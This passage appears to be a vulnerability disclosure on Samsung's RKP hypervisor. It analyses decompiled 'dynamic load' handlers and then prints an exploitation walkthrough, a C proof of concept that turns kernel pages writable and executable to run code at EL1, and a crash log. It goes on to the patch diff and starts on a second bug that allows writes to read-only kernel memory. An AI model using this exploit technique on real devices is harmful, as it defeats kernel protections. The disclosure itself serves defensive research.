Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.

Vulnerability

We found this vulnerability while investigating the "dynamic load" feature of RKP. It allows the kernel to load into memory executable binaries that must be signed by Samsung. It is currently only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem is only available on Exynos devices, this feature is not implemented for Snapdragon devices.

To understand how this feature works, we can start by looking at the kernel sources to find where it is used. By searching for the RKP_DYNAMIC_LOAD command, we can find two functions that load and unload "dynamic executables": fimc_is_load_ddk_bin and fimc_is_load_rta_bin.

In fimc_is_load_ddk_bin, the kernel starts by filling the rkp_dynamic_load_t structure with information about the binary. If the binary is already loaded, it invokes the RKP_DYN_COMMAND_RM subcommand to unload it. It then makes the whole binary memory writable and copies its code and data into it. Finally, it makes the binary code executable by invoking the RKP_DYN_COMMAND_INS subcommand.

int fimc_is_load_ddk_bin(int loadType)
{
    // ...
    rkp_dynamic_load_t rkp_dyn;
    static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
    // ...
    if (loadType == BINARY_LOAD_ALL) {
        memset(&rkp_dyn, 0, sizeof(rkp_dyn));
        rkp_dyn.binary_base = lib_addr;
        rkp_dyn.binary_size = bin.size;
        rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
        rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
        rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
        rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
        rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
        rkp_dyn.type = RKP_DYN_FIMC;
#endif
        if (rkp_dyn_before.type)
            uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
        memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
        // ...
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
        // ...
#ifdef USE_ONE_BINARY
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
        // ...
#endif
        // ...
        memcpy((void *)lib_addr, bin.data, bin.size);
        // ...
        ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
        // ...
}

The rkp_dynamic_load_t structure is filled with the type of the executable (RKP_DYN_FIMC if it has one code segment, RKP_DYN_FIMC_COMBINED if it has two), the base address and size of the whole binary, and the base address and size of its code segment(s).

typedef struct dynamic_load_struct{
    u32 type;
    u64 binary_base;
    u64 binary_size;
    u64 code_base1;
    u64 code_size1;
    u64 code_base2;
    u64 code_size2;
} rkp_dynamic_load_t;

In the hypervisor, the handler of the RKP_DYNAMIC_LOAD command and its subcommands is the rkp_cmd_dynamic_load function. It dispatches the subcommand (RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT, RKP_DYN_COMMAND_INS, or RKP_DYN_COMMAND_RM) to the appropriate function.

int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...

  // Get the subcommand and convert the argument structure address.
  type = regs->x2;
  rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
  // Call the handler specific to the subcommand type.
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    if (res) {
      uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
    }
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
    }
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
    }
  } else {
    res = 0;
  }
  // Put the return code in the memory referenced by x4.
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  // Put the return code in x0.
  regs->x0 = res;
  return res;
}

The RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT subcommand is of no interest to us since it can only be called prior to initialization.

The RKP_DYN_COMMAND_INS subcommand, used to load a binary, is handled by dynamic_load_ins. It calls a bunch of functions sequentially:

If any of the functions it calls fail, except dynamic_load_check, it will try to undo its changes by calling the same functions as in the unloading path.

int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Validate the argument structure.
  if (dynamic_load_check(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
    return 0xf13c0001;
  }
  // Make the code segment(s) read-only executable in the stage 2.
  if (dynamic_load_protection(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
    res = 0xf13c0002;
    goto EXIT_RW;
  }
  // Verify the signature of the dynamic executable.
  if (dynamic_load_verify_signing(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
    res = 0xf13c0003;
    goto EXIT_RW;
  }
  // Make the code segment(s) read-only executable in the stage 1.
  if (dynamic_load_make_rox(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
    res = 0xf13c0004;
    goto EXIT_SET_PXN;
  }
  // Add the code segment(s) to the executable_regions memlist.
  if (dynamic_load_add_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
    res = 0xf13c0005;
    goto EXIT_RM_EXECUTABLE;
  }
  // Add the binary's address range to the dynamic_load_regions memlist.
  if (dynamic_load_add_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
    res = 0xf13c0006;
    goto EXIT_RM_DYNLIST;
  }
  return 0;

EXIT_RM_DYNLIST:
  // Undo: remove the binary's address range from the dynamic_load_regions memlist.
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
  }
EXIT_RM_EXECUTABLE:
  // Undo: remove the code segment(s) from the executable_regions memlist.
  if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
  }
EXIT_SET_PXN:
  // Undo: make the code segment(s) read-only non-executable in the stage 1.
  if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
  }
EXIT_RW:
  // Undo: make the code segment(s) read-write executable in the stage 2.
  if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
  }
  return res;
}

The RKP_DYN_COMMAND_RM subcommand, used to unload a binary, is handled by dynamic_load_rm. It also calls a bunch of functions sequentially:

int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the binary's address range from the dynamic_load_regions memlist.
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
    res = 0xf13c0007;
  }
  // Make the code segment(s) read-only non-executable in the stage 1.
  else if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
    res = 0xf13c0008;
  }
  // Remove the code segment(s) from the executable_regions memlist.
  else if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
    res = 0xf13c0009;
  }
  // Make the code segment(s) read-write executable in the stage 2.
  else if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
    res = 0xf13c000a;
  } else {
    res = 0;
  }
  return res;
}

Executable Loading

dynamic_load_check ensures the address range of the binary doesn't overlap with other currently loaded binaries and with memory that is read-only in the stage 2. Unfortunately, this is not enough. In particular, it doesn't ensure that the code segments are within the binary's address range. Please note that if pgt_bitmap_overlaps_range returns an error, ul_log is called with a D (debug) log level, which will result in a panic.

int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Dynamic executables of type RKP_DYN_MODULE are not allowed to be loaded.
  if (rkp_dyn->type == RKP_DYN_MODULE) {
    return -1;
  }
  // Check if the binary's address range overlaps with the dynamic_load_regions memlist.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  // Check if any of the pages of the binary's address range is marked read-only in the ro_bitmap.
  if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
  }
  return 0;
}

dynamic_load_protection makes the code segment(s) R-X in the stage 2 by calling rkp_s2_range_change_permission.

int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-only executable in the second stage.
  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80 /* read-only */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Make the second code segment read-only executable in the second stage.
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80 /* read-only */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_verify_signing verifies the signature of the whole binary's address space (remember that the binary's code and data were copied into that space by the kernel). Signature verification can be disabled by the kernel by setting NO_FIMC_VERIFY in the rkp_start command.

int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Check if signature verification was disabled by the kernel in rkp_start.
  if (NO_FIMC_VERIFY) {
    uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
    return 0;
  }
  // Only the signature of RKP_DYN_FIMC and RKP_DYN_FIMC_COMBINED dynamic executables is checked.
  if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Call fmic_signature_verify that does the actual signature checking.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
         rkp_dyn->binary_size);
  return 0;
}

dynamic_load_make_rox makes the code segment(s) R-X in the stage 1 by calling rkp_set_range_to_rox.

int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-only executable in the first stage.
  res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Make the second code segment read-only executable in the first stage.
    res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_add_executable adds the code segment(s) to the list of executable memory regions.

int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Add the first code segment to the executable_regions memlist.
  res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Add the second code segment to the executable_regions memlist.
    res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_add_dynlist adds the binary's address range to the list of dynamically loaded executables.

int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Allocate a copy of the argument strucutre.
  dynlist_entry = static_heap_alloc(0x38, 0);
  memcpy(dynlist_entry, rkp_dyn, 0x38);
  // Add the binary's address range to the dynamic_load_regions memlist and save the binary information alongside.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}

Executable Unloading

dynamic_load_rm_dynlist removes the binary's address range from the list of dynamically loaded executables.

int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the binary's address range from the dynamic_load_regions memlist and retrieve the saved binary information.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
  if (res) {
    return res;
  }
  if (!dynlist_entry) {
    uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
    return -11;
  }
  // Compare the first code segment base address and size with the saved binary information.
  res = 0;
  if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
    --res;
  }
  // Compare the second code segment base address and size with the saved binary information.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
      (rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
    --res;
  }
  // Free the copy the argument structure.
  static_heap_free(dynlist_entry);
  return res;
}

dynamic_load_rm_executable removes the code segment(s) from the list of executable memory regions.

int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the first code segment to the executable_regions memlist.
  res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Remove the first code segment to the executable_regions memlist.
    res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
  }
  return res;
}

dynamic_load_set_pxn makes the code segment(s) non-executable in the stage 1 by calling rkp_set_range_to_pxn.

int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment non-executable in the first stage.
  res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Make the second code segment non-executable in the first stage.
    res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_rw makes the code segment(s) RWX in the stage 2 by calling rkp_s2_range_change_permission.

int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-write executable in the second stage.
  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0 /* read-write */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Make the second code segment read-write executable in the second stage.
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

Vulnerability

From the high-level description of the functions given above, we can notice in particular that if we give a code segment that is currently R-X or RW- in the stage 2, dynamic_load_protection will make it R-X. And if an error occurs after that, dynamic_load_rw will be called to undo the changes and make it RWX, regardless of the original permissions. Thus, we can effectively make kernel memory executable.

In practice, to pass the checks in dynamic_load_check, we need to specify a binary_base that is in writable memory in the stage 2, but code_base1 and code_base2 can be in read-only memory. Now, to trigger a failure, we can specify a code_base2 that is not page-aligned. That way, the second call to rkp_s2_range_change_permission in dynamic_load_protection will fail, and dynamic_load_rw will be executed. The second call to rkp_s2_range_change_permission in dynamic_load_rw will also fail, but that's not an issue.

Exploitation

The vulnerability allows us to change memory that is currently R-X or RW- in the stage 2 to RWX. In order to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1, so that we only have to modify the stage 2 permissions. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap) as a second mapping that is writable. By writing our code to this second mapping and executing it from the first, we can achieve arbitrary code execution.

          stage 1   stage 2
 EXEC_VA ---------+--------> TARGET_PA
            R-X   |   R-X
                  |    ^---- will be changed to RWX
WRITE_VA ---------+
            RW-

By dumping the page tables of the stage 1, we can easily find a double-mapped page.

...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...

If our executable mapping is at 0xFFFFFF80FA500000, we can deduce that the writable mapping will be at 0xFFFFFFC87571F000:

>>> EXEC_VA = 0xFFFFFF80FA6FF000
>>> TARGET_PA = EXEC_VA - 0xFFFFFF80FA500000 + 0x00000008F5520000
>>> TARGET_PA
0x8F571F000
>>> WRITE_VA = 0xFFFFFFC800000000 + TARGET_PA - 0x0000000880000000
>>> WRITE_VA
0xFFFFFFC87571F000

And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X.

...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...

The last important thing we need to take into account when writing our exploit are caches (data and instructions). To be safe, in our exploit, we decided to prefix the code to execute with some "bootstrap" instructions that will clean the caches.

Proof of Concept

#define UH_APP_RKP 0xC300C002

#define RKP_DYNAMIC_LOAD      0x20
#define RKP_DYN_COMMAND_INS   0x01
#define RKP_DYN_FIMC_COMBINED 0x03

/* these 2 VAs point to the same PA */
#define EXEC_VA  0xFFFFFF80FA6FF000UL
#define WRITE_VA 0xFFFFFFC87571F000UL

/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xD50B7520D5087620UL
#define DSB_ISH_ISB     0xD5033FDFD5033B9FUL

void exploit() {
    /* fill the structure given as argument */
    uint64_t rkp_dyn = kernel_alloc(0x38);
    kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
    kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000));  // binary_base
    kernel_write(rkp_dyn + 0x10, 0x1000);                // binary_size
    kernel_write(rkp_dyn + 0x18, EXEC_VA);               // code_base1
    kernel_write(rkp_dyn + 0x20, 0x1000);                // code_size1
    kernel_write(rkp_dyn + 0x28, EXEC_VA + 1);           // code_base2
    kernel_write(rkp_dyn + 0x30, 0x1000);                // code_size2

    /* call the hypervisor to make the page RWX */
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);

    /* copy the code using the writable mapping */
    uint32_t code[] = {
        0xDEADBEEF,
        0,
    };
    kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
    kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
    for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
        kernel_write(WRITE_VA + 0x10 + i * 8, code[i * 2]);

    /* and execute it using the executable mapping */
    kernel_exec(EXEC_VA, WRITE_VA);
}

As a result of running the proof of concept, we get an undefined instruction exception that we can observe in the kernel log (note the (deadbeef) part):

<2>[  207.365236]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[  207.365310]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[  207.365338]  [3:     rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[  207.365361]  [3:     rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[  207.365372]  [3:     rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[  207.365386]  [3:     rkp_exploit:15549] Modules linked in:
<0>[  207.365401]  [3:     rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[  207.365418]  [3:     rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[  207.365430]  [3:     rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[  207.365438]  [3:     rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[  207.365456]  [3:     rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[  207.365468]  [3:     rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365480]  [3:     rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365491]  [3:     rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[  207.365541]  [3:     rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[  207.365574]  [3:     rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[  207.365590]  [3:     rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G        W       4.14.113 #14
<4>[  207.365602]  [3:     rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[  207.365617]  [3:     rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[  207.365632]  [3:     rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[  207.365644]  [3:     rkp_exploit:15549] LR is at 0xffffff80fa6ff004

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The two-fold bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Implement thorough checking in the "dynamic executable" commands:
    - The code segment(s) should not overlap any read-only pages
    (maybe checking the ro_bitmap or calling is_phys_map_free is enough)
    - dynamic_load_rw should not make the code segment(s) executable on failure
    (to prevent abusing it to create executable kernel pages...)
    - Ensure signature checking is enabled (it was disabled on some devices)

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

Changes were made to the dynamic_load_check function. As suggested, checks were added to ensure that both code segments are within the binary's address range. While the new checks don't account for integer overflows on all the base + size additions, but we noticed that was changed later in the October security update.

int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
    // ...

    if (rkp_dyn->type == RKP_DYN_MODULE)
        return -1;
+    binary_base = rkp_dyn->binary_base;
+    binary_end = rkp_dyn->binary_size + binary_base;
+    code_base1 = rkp_dyn->code_base1;
+    code_end1 = rkp_dyn->code_size1 + code_base1;
+    if (code_base1 < binary_base || code_end1 > binary_end) {
+        uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+        return -1;
+    }
+    if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+        code_base2 = rkp_dyn->code_base2;
+        code_end2 = rkp_dyn->code_size2 + code_base2;
+        if (code_base2 < binary_base || code_end2 > binary_end) {
+            uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+            return -1;
+        }
+        if ((code_base1 > code_base2 && code_base1 < code_end2)
+                || (code_base2 > code_base1 && code_base2 < code_end1)) {
+            uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+            return -1;
+        }
+    }
    binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
    if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
        uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
        return -1;
    }
    if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
        uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
    return 0;
}

Since the binary's address range is then checked against the ro_bitmap using pgt_bitmap_overlaps_range, it is no longer possible to change memory from R-X to RWX in the stage 2. It is still possible to change memory that is RW- to RWX, but there are already RWX pages in the stage 2. The hypervisor also ensures that if such a page is mapped as executable in the stage 1, it is made read-only in the stage 2.

Writing to read-only kernel memory

SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.

Vulnerability

The last vulnerability comes from a limitation of virt_to_phys_el1, the function used by RKP to convert a virtual address into a physical address.

It uses the AT S12E1R (Address Translate Stages 1 and 2 EL1 Read) and AT S12E1W (Address Translate Stages 1 and 2 EL1 Write) instructions that perform a full (stages 1 and 2) address translation, as if the kernel was trying to read or write, respectively, at that virtual address. By checking the PAR_EL1 (Physical Address Register) register, the function can know if the address translation succeeded and retrieve the physical address.

Most specifically, virt_to_phys_el1 uses AT S12E1R, and if that first address translation fails, it then uses AT S12E1W. That means that any virtual address that can be read and/or written by the kernel can be successfully translated by the function.

uint64_t virt_to_phys_el1(uint64_t addr) {
  // ...

  // Ignore null VAs.
  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  // Try to translate the VA using the AT S12E1R instruction (simulate a kernel read).
  ats12e1r(addr);
  isb();
  par_el1 = get_par_el1();
  // Check the PAR_EL1 register to see if the AT succeeded.
  if ((par_el1 & 1) != 0) {
    // Try again to translate the VA using the AT S12E1W instruction (simulate a kernel write).
    ats12e1w(addr);
    isb();
    par_el1 = get_par_el1();
  }
  cs_exit(s2_lock);
  // Check the PAR_EL1 register to see if the AT succeeded.
  if ((par_el1 & 1) != 0) {
    isb();
    // If the MMU is enabled, log and print the stack contents (only once).
    if ((get_sctlr_el1() & 1) != 0) {
      uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
      if (!dword_87035098) {
        dword_87035098 = 1;
        print_stack_contents();
      }
      dword_87035098 = 0;
    }
    return 0;
  }
  // If the AT succeeded, return the output PA.
  else {
    return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
  }
}

The issue is that functions will call virt_to_phys_el1 to convert a kernel VA, some times to read from it, other times to write to it. However, since virt_to_phys_el1 still translates the VA even if it is only readable, we can abuse this oversight to write to memory that is read-only from the kernel.

Exploitation

Interesting targets in kernel memory include anything that is read-only in the stage 2, such as the kernel page tables, struct cred, struct task_security_struct, etc. We also need to find a command handler that uses the virt_to_phys_el1 function, writes to the translated address, and can be called after the hypervisor is fully initialized. There are only two command handlers that fit the bill:

  • rkp_cmd_rkp_robuffer_alloc, which writes the address of the newly allocated page;
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
    *virt_to_phys_el1(ret_va) = page;
  }
  regs->x0 = page;
  return 0;
}
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
